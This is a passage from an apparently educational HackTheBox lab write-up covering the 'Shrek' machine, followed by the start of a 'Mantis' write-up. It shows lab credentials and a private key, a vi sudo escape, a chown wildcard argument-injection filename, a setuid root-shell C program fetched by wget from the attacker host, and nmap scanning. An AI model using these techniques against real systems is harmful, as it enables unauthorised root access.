-rw-r--r-- 1 0 0 11264 Aug 14 09:01 173224a539f74d5bbd78bd097884a445.txt
-rw-r--r-- 1 0 0 15360 Aug 14 09:01 1cf72311c8394b85bee71378452a0627.txt
-rw-r--r-- 1 0 0 3072 Aug 14 09:01 2d0b3a4e22dc4043976529e9e450839d.txt
-rw-r--r-- 1 0 0 3072 Aug 14 09:01 2fdfec98b6f54a4bb2c24492804ed23e.txt
-rw-r--r-- 1 0 0 15360 Aug 14 09:01 3416a6f48fb7407e8bfa58ee7869b4c9.txt
-rw-r--r-- 1 0 0 15360 Aug 14 09:01 35ed54b85fda4c728e28d043ceff403f.txt
-rw-r--r-- 1 0 0 7168 Aug 14 09:01 3896633fd0f44d5789df5366050ecc4f.txt
-rw-r--r-- 1 0 0 14336 Aug 14 09:01 40c2e657bcc54c78be1986e9bb45886a.txt
-rw-r--r-- 1 0 0 15390 Aug 14 09:01 4328526e95f2406d8af2428b92a3afa8.txt
-rw-r--r-- 1 0 0 3072 Aug 14 09:01 549fe668212042acbcc96af1758141a4.txt
-rw-r--r-- 1 0 0 6144 Aug 14 09:01 629ac3a5efe24adaa7b5172f8bda44ca.txt
-rw-r--r-- 1 0 0 8192 Aug 14 09:01 631385a5a1ce4e46a206f0f0fbdc0808.txt
-rw-r--r-- 1 0 0 6144 Aug 14 09:01 68b211ee5513471e8b7de17661d18a9d.txt
-rw-r--r-- 1 0 0 13312 Aug 14 09:01 6aee99ecf1aa4ce78ee8d990e2c91e9a.txt
-rw-r--r-- 1 0 0 15360 Aug 14 09:01 79947ab62f1a4b959b68ada2b7849ff2.txt
-rw-r--r-- 1 0 0 5120 Aug 14 09:01 7ef381dce26a488493df64b67f3db3cf.txt
-rw-r--r-- 1 0 0 5120 Aug 14 09:01 84644e19171e425d8ac6e6e7a1398c46.txt
-rw-r--r-- 1 0 0 15360 Aug 14 09:01 9c11f948f169414cb4d3cfb607850e58.txt
-rw-r--r-- 1 0 0 6144 Aug 14 09:01 9de89e29bdb64a5eb69f1a8f344cd85a.txt
-rw-r--r-- 1 0 0 5120 Aug 14 09:01 a1127bfd922e43f0b0007b147c26e11e.txt
-rw-r--r-- 1 0 0 7168 Aug 14 09:01 a381c21f0e874439a1a634a940eaf4a9.txt
-rw-r--r-- 1 0 0 7168 Aug 14 09:01 b26e893ae4b84ca28872fc519c3803fc.txt
-rw-r--r-- 1 0 0 8192 Aug 14 09:01 b2edd39d22674696a56a7939af2ff917.txt
-rw-r--r-- 1 0 0 4096 Aug 14 09:01 bf22aa78874249a4a855995884f1daeb.txt
-rw-r--r-- 1 0 0 7598 Aug 14 09:01 d25fcf2994e14ebf990cf5b9f0b98691.txt
-rw-r--r-- 1 0 0 12288 Aug 14 09:01 dddedeb00dee439a86f7ac4c583ec700.txt
-rw-r--r-- 1 0 0 9216 Aug 14 09:01 e415d037bfb74c5fa6d0521ff662de8d.txt
-rw-r--r-- 1 0 0 15360 Aug 14 09:01 e5598789c60b45cf9f821e130af3b70e.txt
-rw-r--r-- 1 0 0 6144 Aug 14 09:01 f274007acbbb431185bc1fb3a1a8c5c0.txt
-rw-r--r-- 1 0 0 1766 Aug 16 2017 key
We retrieve key which is an encrypted private ssh key:
![](prg/4/013.png)
So instead of getting every file from the ftp service one by one, we'll just use wget:
[ 10.10.14.8/23 ] [ /dev/pts/0 ] [~/_HTB/Shrek]
→ wget -r --user="donkey" --password="d0nk3y1337!" ftp://10.10.10.47/
--2020-08-14 12:25:21-- ftp://10.10.10.47/
=> 10.10.10.47/.listing
Connecting to 10.10.10.47:21... connected.
Logging in as donkey ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD not needed.
==> PASV ... done. ==> LIST ... done.
[...]
[ 10.10.14.8/23 ] [ /dev/pts/0 ] [~/_HTB/Shrek]
→ ls -lashR
.:
total 3.4M
4.0K drwxr-xr-x 3 nothing nothing 4.0K Aug 14 12:25 .
4.0K drwxr-xr-x 5 nothing nothing 4.0K Aug 14 11:58 ..
4.0K drwxr-xr-x 2 nothing nothing 4.0K Aug 14 12:25 10.10.10.47
4.0K -rw-r--r-- 1 nothing nothing 1.8K Aug 14 12:20 key
3.4M -rw-r--r-- 1 nothing nothing 3.3M Aug 15 2017 'Smash Mouth - All Star.mp3'
./10.10.10.47:
total 332K
4.0K drwxr-xr-x 2 nothing nothing 4.0K Aug 14 12:25 .
4.0K drwxr-xr-x 3 nothing nothing 4.0K Aug 14 12:25 ..
12K -rw-r--r-- 1 nothing nothing 9.0K Aug 14 09:01 0a935efe212d455eaba901f743e76a1f.txt
8.0K -rw-r--r-- 1 nothing nothing 7.0K Aug 14 09:01 129a5d725798449cbe35c14226c21ec8.txt
12K -rw-r--r-- 1 nothing nothing 11K Aug 14 09:01 173224a539f74d5bbd78bd097884a445.txt
16K -rw-r--r-- 1 nothing nothing 15K Aug 14 09:01 1cf72311c8394b85bee71378452a0627.txt
4.0K -rw-r--r-- 1 nothing nothing 3.0K Aug 14 09:01 2d0b3a4e22dc4043976529e9e450839d.txt
4.0K -rw-r--r-- 1 nothing nothing 3.0K Aug 14 09:01 2fdfec98b6f54a4bb2c24492804ed23e.txt
16K -rw-r--r-- 1 nothing nothing 15K Aug 14 09:01 3416a6f48fb7407e8bfa58ee7869b4c9.txt
16K -rw-r--r-- 1 nothing nothing 15K Aug 14 09:01 35ed54b85fda4c728e28d043ceff403f.txt
8.0K -rw-r--r-- 1 nothing nothing 7.0K Aug 14 09:01 3896633fd0f44d5789df5366050ecc4f.txt
16K -rw-r--r-- 1 nothing nothing 14K Aug 14 09:01 40c2e657bcc54c78be1986e9bb45886a.txt
16K -rw-r--r-- 1 nothing nothing 16K Aug 14 09:01 4328526e95f2406d8af2428b92a3afa8.txt
4.0K -rw-r--r-- 1 nothing nothing 3.0K Aug 14 09:01 549fe668212042acbcc96af1758141a4.txt
8.0K -rw-r--r-- 1 nothing nothing 6.0K Aug 14 09:01 629ac3a5efe24adaa7b5172f8bda44ca.txt
8.0K -rw-r--r-- 1 nothing nothing 8.0K Aug 14 09:01 631385a5a1ce4e46a206f0f0fbdc0808.txt
8.0K -rw-r--r-- 1 nothing nothing 6.0K Aug 14 09:01 68b211ee5513471e8b7de17661d18a9d.txt
16K -rw-r--r-- 1 nothing nothing 13K Aug 14 09:01 6aee99ecf1aa4ce78ee8d990e2c91e9a.txt
16K -rw-r--r-- 1 nothing nothing 15K Aug 14 09:01 79947ab62f1a4b959b68ada2b7849ff2.txt
8.0K -rw-r--r-- 1 nothing nothing 5.0K Aug 14 09:01 7ef381dce26a488493df64b67f3db3cf.txt
8.0K -rw-r--r-- 1 nothing nothing 5.0K Aug 14 09:01 84644e19171e425d8ac6e6e7a1398c46.txt
16K -rw-r--r-- 1 nothing nothing 15K Aug 14 09:01 9c11f948f169414cb4d3cfb607850e58.txt
8.0K -rw-r--r-- 1 nothing nothing 6.0K Aug 14 09:01 9de89e29bdb64a5eb69f1a8f344cd85a.txt
8.0K -rw-r--r-- 1 nothing nothing 5.0K Aug 14 09:01 a1127bfd922e43f0b0007b147c26e11e.txt
8.0K -rw-r--r-- 1 nothing nothing 7.0K Aug 14 09:01 a381c21f0e874439a1a634a940eaf4a9.txt
8.0K -rw-r--r-- 1 nothing nothing 7.0K Aug 14 09:01 b26e893ae4b84ca28872fc519c3803fc.txt
8.0K -rw-r--r-- 1 nothing nothing 8.0K Aug 14 09:01 b2edd39d22674696a56a7939af2ff917.txt
4.0K -rw-r--r-- 1 nothing nothing 4.0K Aug 14 09:01 bf22aa78874249a4a855995884f1daeb.txt
8.0K -rw-r--r-- 1 nothing nothing 7.5K Aug 14 09:01 d25fcf2994e14ebf990cf5b9f0b98691.txt
12K -rw-r--r-- 1 nothing nothing 12K Aug 14 09:01 dddedeb00dee439a86f7ac4c583ec700.txt
12K -rw-r--r-- 1 nothing nothing 9.0K Aug 14 09:01 e415d037bfb74c5fa6d0521ff662de8d.txt
16K -rw-r--r-- 1 nothing nothing 15K Aug 14 09:01 e5598789c60b45cf9f821e130af3b70e.txt
8.0K -rw-r--r-- 1 nothing nothing 6.0K Aug 14 09:01 f274007acbbb431185bc1fb3a1a8c5c0.txt
4.0K -rw-r--r-- 1 nothing nothing 1.8K Aug 16 2017 key
The idea here is to check the wordcount with the wc command:
[ 10.10.14.8/23 ] [ /dev/pts/0 ] [~/_HTB/Shrek/10.10.10.47]
→ wc *.txt
0 1 9216 0a935efe212d455eaba901f743e76a1f.txt
0 1 7168 129a5d725798449cbe35c14226c21ec8.txt
0 1 11264 173224a539f74d5bbd78bd097884a445.txt
0 1 15360 1cf72311c8394b85bee71378452a0627.txt
0 1 3072 2d0b3a4e22dc4043976529e9e450839d.txt
0 1 3072 2fdfec98b6f54a4bb2c24492804ed23e.txt
0 1 15360 3416a6f48fb7407e8bfa58ee7869b4c9.txt
0 1 15360 35ed54b85fda4c728e28d043ceff403f.txt
0 1 7168 3896633fd0f44d5789df5366050ecc4f.txt
0 1 14336 40c2e657bcc54c78be1986e9bb45886a.txt
**0 3 15390 4328526e95f2406d8af2428b92a3afa8.txt**
0 1 3072 549fe668212042acbcc96af1758141a4.txt
0 1 6144 629ac3a5efe24adaa7b5172f8bda44ca.txt
0 1 8192 631385a5a1ce4e46a206f0f0fbdc0808.txt
0 1 6144 68b211ee5513471e8b7de17661d18a9d.txt
0 1 13312 6aee99ecf1aa4ce78ee8d990e2c91e9a.txt
0 1 15360 79947ab62f1a4b959b68ada2b7849ff2.txt
0 1 5120 7ef381dce26a488493df64b67f3db3cf.txt
0 1 5120 84644e19171e425d8ac6e6e7a1398c46.txt
0 1 15360 9c11f948f169414cb4d3cfb607850e58.txt
0 1 6144 9de89e29bdb64a5eb69f1a8f344cd85a.txt
0 1 5120 a1127bfd922e43f0b0007b147c26e11e.txt
0 1 7168 a381c21f0e874439a1a634a940eaf4a9.txt
0 1 7168 b26e893ae4b84ca28872fc519c3803fc.txt
0 1 8192 b2edd39d22674696a56a7939af2ff917.txt
0 1 4096 bf22aa78874249a4a855995884f1daeb.txt
**0 3 7598 d25fcf2994e14ebf990cf5b9f0b98691.txt**
0 1 12288 dddedeb00dee439a86f7ac4c583ec700.txt
0 1 9216 e415d037bfb74c5fa6d0521ff662de8d.txt
0 1 15360 e5598789c60b45cf9f821e130af3b70e.txt
0 1 6144 f274007acbbb431185bc1fb3a1a8c5c0.txt
0 35 283084 total
Here 2 files stand out since they have 3 words each:
![](prg/4/014.png)
The 2nd word in the first file gives us a username:
[ 10.10.14.8/23 ] [ /dev/pts/9 ] [~/_HTB/Shrek/10.10.10.47]
→ echo 'UHJpbmNlQ2hhcm1pbmc=' | base64 -d
PrinceCharming
The 2nd file gives us binary data:
![](prg/4/015.png)
In order to recover the password we have to guess that this is using ECC cryptography, and that we needed to use python3's seccure library:
[ 10.10.14.8/23 ] [ /dev/pts/9 ] [~/_HTB/Shrek/10.10.10.47]
→ sudo apt install python3-pip
[sudo] password for nothing:
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
python-pip-whl python3-wheel
The following NEW packages will be installed:
python-pip-whl python3-pip python3-wheel
0 upgraded, 3 newly installed, 0 to remove and 0 not upgraded.
Need to get 2,078 kB of archives.
After this operation, 3,329 kB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 http://archive-4.kali.org/kali kali-rolling/main amd64 python-pip-whl all 20.0.2-5kali1 [1,842 kB]
Get:2 http://archive-4.kali.org/kali kali-rolling/main amd64 python3-wheel all 0.34.2-1 [24.0 kB]
Get:3 http://archive-4.kali.org/kali kali-rolling/main amd64 python3-pip all 20.0.2-5kali1 [211 kB]
Fetched 2,078 kB in 1s (1,746 kB/s)
Selecting previously unselected package python-pip-whl.
(Reading database ... 311886 files and directories currently installed.)
Preparing to unpack .../python-pip-whl_20.0.2-5kali1_all.deb ...
Unpacking python-pip-whl (20.0.2-5kali1) ...
Selecting previously unselected package python3-wheel.
Preparing to unpack .../python3-wheel_0.34.2-1_all.deb ...
Unpacking python3-wheel (0.34.2-1) ...
Selecting previously unselected package python3-pip.
Preparing to unpack .../python3-pip_20.0.2-5kali1_all.deb ...
Unpacking python3-pip (20.0.2-5kali1) ...
Setting up python3-wheel (0.34.2-1) ...
Setting up python-pip-whl (20.0.2-5kali1) ...
Setting up python3-pip (20.0.2-5kali1) ...
Processing triggers for man-db (2.9.3-2) ...
Processing triggers for kali-menu (2020.3.2) ...
Scanning processes...
Scanning processor microcode...
Scanning linux images...
Running kernel seems to be up-to-date.
The processor microcode seems to be up-to-date.
No services need to be restarted.
No containers need to be restarted.
No user sessions are running outdated binaries.
[ 10.10.14.8/23 ] [ /dev/pts/9 ] [~/_HTB/Shrek/10.10.10.47]
→ pip3 install seccure
Collecting seccure
Downloading seccure-0.5.0.tar.gz (40 kB)
|████████████████████████████████| 40 kB 1.0 MB/s
Collecting gmpy2>=2
Downloading gmpy2-2.0.8.zip (280 kB)
|████████████████████████████████| 280 kB 2.0 MB/s
Collecting pycryptodome
Downloading pycryptodome-3.9.8-cp38-cp38-manylinux1_x86_64.whl (13.7 MB)
|████████████████████████████████| 13.7 MB 7.0 MB/s
Requirement already satisfied: six>=1.2 in /usr/lib/python3/dist-packages (from seccure) (1.15.0)
Building wheels for collected packages: seccure, gmpy2
Building wheel for seccure (setup.py) ... done
Created wheel for seccure: filename=seccure-0.5.0-py3-none-any.whl size=40750 sha256=99e3b0dbd16cb3c1eb87b2049ac5d24e70b803086078c97f634ba874f9b519b3
Then we run it like so:
python3
Python 3.8.3rc1 (default, Aug 14 2020, 11:45:56)
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import seccure
>>> cipher = b'\x01\xd3\xe1\xf2\x17T \xd0\x8a\xd6\xe2\xbd\x9e\x9e~P(\xf7\xe9\xa5\xc1KT\x9aI\xdd\\!\x95t\xe1\xd6p\xaa"u2\xc2\x85F\x1e\xbc\x00\xb9\x17\x97\xb8\x0b\xc5y\xec>> password = b'PrinceCharming'
>>> seccure.decrypt(cipher, password)
b'The password for the ssh file is: shr3k1sb3st! and you have to ssh in as: sec\n'
And there we have credentials! sec:shr3k1sb3st!
[ 10.10.14.8/23 ] [ /dev/pts/1 ] [~/HTB/Shrek]
→ cat key
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,94DC7309349E17F8ED6776ED69D6265A
rx7VJS6fzctpfTQ16y9M2CYG701eIh3nDQND+MSFAMSD8JiElqiIH7yA6TpXKPPx
A9gcxf1qlezc3XIhQpsLN9tLJpOxWYMniUo06/7k+2vWO6AzX27hVPRk1vk9OTWG
gRe856uaS8WfQ3XxehHNk1bu710HzBSwZn/XNbHsNo74Bpol8MTm2BTjvnuxnFY8
tvw53nbXMQffBmrwBTvc5aaCk/C0LfvemSxLAgAwMACNpbPmdw9NkUxRDbL/93Q1
ZYMlFxiXhLgFWQFdW/u2WURmOcIuAHd1V8gWIvY10IpH7o4nXaCI4D8PUmnIDt2N
k6Q3Znnfe8BrzFlD1NdG5SfHNdNUn5N9DROk0cZsL+D9e9bQb5CoyL2ioL9fEeRv
4J5w2ZnIHStAez+Za11WGcZsW3jk2eXGPZiD99k5GcazWQ60dv5dUR6J5fkxaibi
unqmN2tDaKReT7aT4Im6pLUscN8t2w8dprgsD/EbMsPr0X/TqOShXXhMUhk/9SAY
2Rvudp97fqYHugIch4lZdDpYS//KRwzO+wQOQARX0tJ0DJ++lY6WNM/BD6+HUk+v
2c3ziM7DL4i7zhA0qnc8796Nxs8D/QTUWjmcNQhcOM4rAYsmyRqyoVe3ciadKWmk
vfwBJYxCwE9I9qUfZS3TsEYdbLE4MjlFB+Zn+fYpyA950hVFDxvu+E8zIcSYA0bJ
GAra2vH/xgmEoptYqeav/sstisJOYPW1Ui3K5C9E0QMH2MRReZoHlToCSNwUOWRo
rY1z3UZMyV5qw3VsuOk+n81P2npyP0RYo6xjAQW/1uN01LPi6y79j/3k9L35N7pH
vJHACTHa1bgCGkYGYm75DRIPYqJKs8g3htPHTbyfAfybeMBFQFxz3SBSWp8T9yjF
+WKUWQ2EmUtgC9n04tLf1/SIldvtOvtwyv2LiIzgvtT6DCMoulprRlb+U0iY1kbQ
lrpUhFtcK1SvC4Z6ebAEoX/jVRWKdbKldr35ECwIiMVNUFhvXwg4JRdmgmeeDga5
66TSTqupISE7q6MuBfesQItkoiairO36enBvYdifN4/kRFBNXo1ZUTzdKVw6/UVo
n9tG9Fnk/z/Ee0iuT3PS0xtu6cBaXzFggm1n73honBjJzIJdtDAJ2AFSMJg6F6TJ
d0BPB0SGfF8rU+s0RjBhr1nE+px9qYKsuPAKkfi/b/EVa5WEacNezUTTKW9v9DjM
ym/zSi9GMDEczlFO2wthN5MXh0XNzUyQxDAcek1uZyaQd66NXQ0AywQG114+XLx8
29sJvTuy6PXJs4ZUCno4/7RQnG9mwHtcV2f3ETASTjtsxBVotzfnpB22jgRND1fi
Ovqy0xbhRUrBhl8MjuE4Ha/ttoKvbDxC6PlVPMfjp3y2sTIDRp7HpAJfKoVMdJ5Y
9FoWkWhrGkshGMIxyF3YE6cyhy8OOvmoEcNjyusCi1VWJpRxWU9Ml+GUH5gsjdAV
yiPvEG4LnM4gGeHhn9CZcrFJSYKIS0s+410YQvpECx09LaLBtq5y0QNkIspuKSPB
UDidMCyboqlc47D6SgNk7WQqut9tFj6PXE3chFFBHGfZ3hF9HnbUWBEiqyvOlAnm
-----END RSA PRIVATE KEY-----
[ 10.10.14.8/23 ] [ /dev/pts/1 ] [~/HTB/Shrek]
→ chmod 600 key
[ 10.10.14.8/23 ] [ /dev/pts/1 ] [~/HTB/Shrek]
→ ssh -i key sec@10.10.10.47
The authenticity of host '10.10.10.47 (10.10.10.47)' can't be established.
ECDSA key fingerprint is SHA256:elYdm7BTN0q3wYoaIdUyw1kBlMFTls2dWHgybMAYav8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.47' (ECDSA) to the list of known hosts.
Enter passphrase for key 'key': shr3kisb3st!
Last login: Thu Oct 1 07:41:33 2020
[sec@shrek ~]$ id
uid=1000(sec) gid=100(users) groups=100(users),10(wheel),95(storage),98(power)
[sec@shrek ~]$ cat user.txt
d353869dc904f1f38d24fa118b397b19
and we have the user flag!
## **Part 3 : Getting Root Access**
To get root access onto the box, we need to first privesc from the user sec to farquad:
[sec@shrek ~]$ sudo -l
User sec may run the following commands on shrek:
(farquad) NOPASSWD: /usr/bin/vi
Get into vi using the user farquad using sudo -u:
[sec@shrek ~]$ sudo -u farquad vi
Then type in **:!bash** to drop into a shell as farquad:
[farquad@shrek sec]$ id
uid=1001(farquad) gid=100(users) groups=100(users),7(lp),10(wheel),91(video),92(audio),93(optical),95(storage)
[farquad@shrek sec]$ cd ~
[farquad@shrek ~]$ ls
mirror
[farquad@shrek ~]$ ./mirror
Mirror, Mirror on the wall who is the most handsome of all?
Of course you Lord Farquad
There we get a funny binary that mimics the mirror from the shrek movie, one may think this is a binexp challenge but when decompiled we see that it's a rabbit hole, since it prints the message and does nothing else. The idea here was to check out cronjobs (which we can guess from running pspy), which hints us towards a cronjob that is running every 5 minutes.
2020/08/14 08:50:19 CMD: UID=0 PID=1178 | /usr/bin/CROND -n
2020/08/14 08:50:19 CMD: UID=0 PID=1176 | /usr/bin/CROND -n
2020/08/14 08:50:19 CMD: UID=0 PID=1179 | /usr/bin/python /root/chown
2020/08/14 08:50:19 CMD: UID=0 PID=1180 | /bin/sh -c cd /usr/src; /usr/bin/chown nobody:nobody *
2020/08/14 08:50:19 CMD: UID=0 PID=1181 | /bin/sh -c cd /usr/src; /usr/bin/chown nobody:nobody *
Farquaad's shell is kind of a rabbithole in itself, so back into sec's shell, we try to find files that were modified after the timestamps we find inside sec's home directory:
[sec@shrek ~]$ ls -lash
total 28K
4.0K drwx------ 3 sec users 4.0K Aug 15 2017 .
4.0K drwxr-xr-x 4 root root 4.0K Aug 11 2017 ..
0 -rw------- 1 root root 0 Aug 22 2017 .bash_history
4.0K -rw-r--r-- 1 sec users 21 Feb 14 2017 .bash_logout
4.0K -rw-r--r-- 1 sec users 57 Feb 14 2017 .bash_profile
4.0K -rw-r--r-- 1 sec users 141 Feb 14 2017 .bashrc
4.0K drwxr-xr-x 2 root root 4.0K Aug 16 2017 .ssh
4.0K -r--r--r-- 1 root root 33 Aug 22 2017 user.txt
[sec@shrek ~]$ find / -newermt 2017-08-20 ! -newermt 2017-08-24 -ls 2>/dev/null
16385 4 drwxr-xr-x 46 root root 4096 Aug 21 2017 /etc
18518 4 -rw-r--r-- 1 root root 6 Aug 23 2017 /etc/hostname
27466 4 drwxr-xr-x 5 root root 4096 Aug 23 2017 /etc/netctl
18515 4 -rw-r--r-- 1 root root 389 Aug 23 2017 /etc/netctl/static
35103 8 -rw-r--r-- 1 root root 4606 Aug 21 2017 /etc/vsftpd.conf
131506 4 drwxr-xr-x 4 root root 4096 Aug 23 2017 /etc/systemd/system
138139 4 -rw-r--r-- 1 root root 196 Aug 23 2017 /etc/systemd/system/netctl@static.service
131581 4 drwxr-xr-x 2 root root 4096 Aug 23 2017 /etc/systemd/system/multi-user.target.wants
138140 0 lrwxrwxrwx 1 root root 41 Aug 23 2017 /etc/systemd/system/multi-user.target.wants/netctl@static.service -> /etc/systemd/system/netctl@static.service
33988 4 -rw------- 1 root root 929 Aug 21 2017 /etc/shadow
33931 4 -rw-r--r-- 1 root root 968 Aug 21 2017 /etc/passwd
131255 4 drwxr-x--- 3 root root 4096 Aug 22 2017 /root
17 4 -r--r--r-- 1 root root 33 Aug 22 2017 /home/sec/user.txt
18 0 -rw------- 1 root root 0 Aug 22 2017 /home/sec/.bash_history
131595 4 drwxr-xr-x 2 root root 4096 Aug 23 2017 /var/lib/dhcpcd
138091 4 drwxr-xr-x 2 root root 4096 Aug 21 2017 /var/spool/cron
138145 4 -rw------- 1 root root 97 Aug 22 2017 /var/spool/cron/root
138108 8196 -rw-r----- 1 root systemd-journal 8388608 Aug 23 2017 /var/log/journal/84d230a047b241c6be827bd5ce531868/user-1001.journal
138101 16388 -rw-r----- 1 root systemd-journal 16777216 Aug 21 2017 /var/log/journal/84d230a047b241c6be827bd5ce531868/system@00055747c657656c-ad9ea2c5440b64ec.journal~
138138 8192 -rw-r----- 1 root systemd-journal 8388608 Aug 21 2017 /var/log/journal/84d230a047b241c6be827bd5ce531868/system@0005574ac144c200-f23de797a5b2e762.journal~
137786 16 -rw------- 1 root utmp 15744 Aug 22 2017 /var/log/btmp.1
131087 8 -rw------- 1 root root 7948 Aug 23 2017 /var/log/vsftpd.log.1
137811 264656 -rw-r--r-- 1 root root 271001726 Aug 23 2017 /var/log/httpd/access_log.1
137906 12 -rw-r--r-- 1 root root 9833 Aug 23 2017 /var/log/httpd/error_log.1
2100 4 drwxr-xr-x 2 sec root 4096 Aug 23 2017 /usr/src
20283 4 -rw-r--r-- 1 root root 91 Aug 22 2017 /usr/src/thoughts.txt
Here we are hinted towards /usr/src/thoughts.txt, and by running pspy earlier we know that there is a cronjob being run against the /usr/src directory, therefore we can exploit the wildcard in the cronjob running **chown nobody:nobody *** there.
[sec@shrek src]$ ls -lash
total 12K
4.0K drwxr-xr-x 2 sec root 4.0K Aug 14 10:57 .
4.0K drwxr-xr-x 8 sec root 4.0K Aug 16 2017 ..
4.0K -rw-r--r-- 1 root root 91 Aug 22 2017 thoughts.txt
The idea here is that thoughts.txt is readable by sec, and yet is owned by root. We need to take advantage of chown's wildcard like so:
[sec@shrek src]$ touch -- -reference=thoughts.txt
[sec@shrek src]$ ls -lash
total 12K
4.0K drwxr-xr-x 2 sec root 4.0K Aug 14 10:59 .
4.0K drwxr-xr-x 8 sec root 4.0K Aug 16 2017 ..
0 -rw-r--r-- 1 sec users 0 Aug 14 10:59 '-reference=thoughts.txt'
4.0K -rw-r--r-- 1 root root 91 Aug 22 2017 thoughts.txt
Now we have created a file named "--reference=thoughts.txt" which will be passed as an arguement to chown when it is run. Once that's done, it's possible to create a binary and set it's SUID bit. After the task runs and showns the binary, it's possible to execute code as root, such as spawning a bash shell!
[terminal 1]
[ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Shrek]
→ vim nihilist.c
[ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Shrek]
→ cat nihilist.c
#include <****stdio.h>
#include <****stdlib.h>
#include <****unistd.h>
int main( int argc, char *argv[] )
{
setreuid(0,0);
execve("/usr/bin/bash", NULL, NULL);
}
[ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Shrek]
→ gcc nihilist.c -o privesc
[ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Shrek]
→ ls -lash
total 36K
4.0K drwxr-xr-x 2 nothing nothing 4.0K Jul 7 13:06 .
4.0K drwxr-xr-x 9 nothing nothing 4.0K Jul 7 12:36 ..
4.0K -rw-r--r-- 1 nothing nothing 153 Jul 7 13:06 nihilist.c
4.0K -rw------- 1 nothing nothing 1.8K Jul 7 12:39 key
20K -rwxr-xr-x 1 nothing nothing 17K Jul 7 13:06 privesc
[ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Shrek]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
[terminal 2]
Now that's done we wait for the cronjob to run and we can :
[sec@shrek ~]$ cd /usr/src/
[sec@shrek src]$ ls -lash
total 12K
4.0K drwxr-xr-x 2 sec root 4.0K Aug 23 2017 .
4.0K drwxr-xr-x 8 sec root 4.0K Oct 1 2020 ..
4.0K -rw-r--r-- 1 root root 91 Aug 22 2017 thoughts.txt
[sec@shrek src]$ wget http://10.10.14.8:9090/privesc
--2021-07-07 11:00:19-- http://10.10.14.8:9090/privesc
Connecting to 10.10.14.8:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16656 (16K) [application/octet-stream]
Saving to: privesc
privesc 100%[======================================================================================================================================================================================>] 16.27K 35.8KB/s in 0.5s
2021-07-07 11:00:20 (35.8 KB/s) - privesc saved [16656/16656]
[sec@shrek src]$ chmod 4755 privesc
[sec@shrek src]$ touch -- --reference=thoughts.txt
[sec@shrek src]$ ls -lash
total 32K
4.0K drwxr-xr-x 2 sec root 4.0K Jul 7 11:00 .
4.0K drwxr-xr-x 8 sec root 4.0K Oct 1 2020 ..
20K -rwsr-xr-x 1 sec users 17K Jul 7 10:48 privesc
0 -rw-r--r-- 1 sec users 0 Jul 7 11:00 '--reference=thoughts.txt'
4.0K -rw-r--r-- 1 root root 91 Aug 22 2017 thoughts.txt
[sec@shrek src]$ date
Wed Jul 7 11:01:26 UTC 2021
[sec@shrek src]$ date
Wed Jul 7 11:20:55 UTC 2021
[sec@shrek src]$ ls -lash privesc
20K -rwsr-sr-x 1 root root 17K Jul 7 11:06 privesc
[sec@shrek src]$ ./privesc
bash-4.4# id
uid=0(root) gid=100(users) groups=100(users),10(wheel),95(storage),98(power)
bash-4.4# cat /root/root.txt
27XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to privesc to the root user and get the root flag.
## **Conclusion**
Here we can see the progress graph :
![](img/4_graph.png)

330
Hard/5.md Normal file
View file

@ -0,0 +1,330 @@
# Mantis Writeup
![](img/5.png)
## Introduction :
Mantis is a hard windows box released back in September 2017.
## **Part 1 : Initial Enumeration**
As always we start with nmap to scan for open ports, using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.17/23 ] [ /dev/pts/3 ] [~]
→ nmap -sCV 10.10.10.52
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-25 17:06 BST
Nmap scan report for 10.10.10.52
Host is up (0.57s latency).
Not shown: 984 closed ports
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-08-25 14:10:56Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -36m00s, deviation: 2h18m34s, median: -1h56m01s
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: mantis.htb.local
|_ System time: 2020-08-25T10:11:51-04:00
| smb-security-mode:
| account_used: <****blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-08-25T14:11:53
|_ start_date: 2020-08-25T14:10:13
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 191.16 seconds
## **Part 2 : Getting User Access**
